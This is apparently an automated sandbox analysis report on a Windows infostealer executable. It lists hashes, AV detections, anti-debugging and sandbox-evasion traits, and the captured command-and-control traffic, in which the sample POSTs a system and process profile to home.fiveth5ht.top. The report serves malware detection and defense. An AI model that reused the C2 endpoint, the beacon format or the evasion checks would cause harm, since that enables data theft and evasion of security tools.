
Windows Analysis Report
PqHnYMj5eF.exe

Overview

General Information

Sample name: PqHnYMj5eF.exe (renamed because the original name is a hash value)
Original sample name: 5a249494869b3ef440bd31b438958585.exe
Analysis ID: 1581243
MD5: 5a249494869b3ef440bd31b438958585
SHA1: d3c4cfbca5b8b1d061ac2f55899dfefc49321cff
SHA256: 0783ed26022f0e0f99d7e6b72ee2d7d7372c97596249299275cc19db7b10a8c4
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PqHnYMj5eF.exe (PID: 8088 cmdline: "C:\Users\user\Desktop\PqHnYMj5eF.exe" MD5: 5A249494869B3EF440BD31B438958585)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: PqHnYMj5eF.exe | Avira: detected
Source: PqHnYMj5eF.exe | ReversingLabs: Detection: 47%
Source: PqHnYMj5eF.exe | Virustotal: Detection: 32%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PqHnYMj5eF.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003EDCF0: -----BEGIN PUBLIC KEY-----
Source: PqHnYMj5eF.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0042A5B0: mov dword ptr [ebp+04h], 424D53FFh
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0042A7F0: mov dword ptr [ebx+04h], 424D53FFh
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0042A7F0: mov dword ptr [edi+04h], 424D53FFh
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0042A7F0: mov dword ptr [esi+04h], 424D53FFh
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0042A7F0: mov dword ptr [edi+04h], 424D53FFh
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0042A7F0: mov dword ptr [esi+04h], 424D53FFh
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0042A7F0: mov dword ptr [ebx+04h], 424D53FFh
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0042B560: mov dword ptr [ebx+04h], 424D53FFh
Source: PqHnYMj5eF.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 | Host: home.fiveth5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 499951 | Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 30 38 35 35 35 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2 | Data Ascii (decoded from Data Raw; the report truncates the payload): { "ip": "8.46.123.189", "current_time": "8468739163627085559", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, ...
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 | Host: home.fiveth5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 209 | Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d | Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 5.101.3.217
Source: Joe Sandbox View | IP Address: 3.218.7.103
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0048A8C0 recvfrom
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 | Host: home.fiveth5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 499951 | Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 30 38 35 35 35 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2 | Data Ascii (decoded from Data Raw; the report truncates the payload): { "ip": "8.46.123.189", "current_time": "8468739163627085559", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, ...
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: PqHnYMj5eF.exe, 00000000.00000003.1474338396.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1494057055.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1474358752.00000000017D8000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: PqHnYMj5eF.exe, 00000000.00000003.1474338396.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1474358752.00000000017D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: PqHnYMj5eF.exe, 00000000.00000003.1474338396.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1494057055.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1474358752.00000000017D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lseiN
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: PqHnYMj5eF.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: PqHnYMj5eF.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: PqHnYMj5eF.exe, PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: PqHnYMj5eF.exe | Static PE information: section name: (blank)
Source: PqHnYMj5eF.exe | Static PE information: section name: .idata
Source: PqHnYMj5eF.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_3_0184CF21
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_3_018341E1
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003D05B0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003D6FA0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003FF100
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0048B180
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0074E050
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0074A000
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_004900E0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00426210
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0048C320
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00714410
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00490420
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003CE620
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0048C770
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00726730
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0042A7F0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00744780
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0047C900
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003CA960
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003D4940
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00596AC0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0067AAC0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00554B60
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0067AB2C
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00738BF0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003CCBB0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0074CC90
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00744D40
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00580D80
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0073CD80
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_006DAE30
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003E4F70
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0048EF90
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00488F90
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00712F90
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003D10E6
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_0072D430
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_007335B0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_007517A0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00479880
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00719920
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00743A70
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00401BE0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00731BD0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00727CC0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_00679C80
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003D5DB0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_3_0185368B
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 00577220 appears 101 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 00404FD0 appears 259 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 003CC960 appears 36 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 004A44A0 appears 72 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 003C71E0 appears 47 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 003CCAA0 appears 63 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 0059CBC0 appears 101 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 004050A0 appears 91 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 003C73F0 appears 110 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 003DCD40 appears 78 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 00405340 appears 50 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 00404F40 appears 327 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 003C75A0 appears 654 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: String function: 003DCCD0 appears 54 times
Source: PqHnYMj5eF.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: PqHnYMj5eF.exe | Static PE information: Section: qmfawksx ZLIB complexity 0.9945058078326783
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: PqHnYMj5eF.exe | ReversingLabs: Detection: 47%
Source: PqHnYMj5eF.exe | Virustotal: Detection: 32%
Source: PqHnYMj5eF.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: PqHnYMj5eF.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Section loaded: iphlpapi.dll
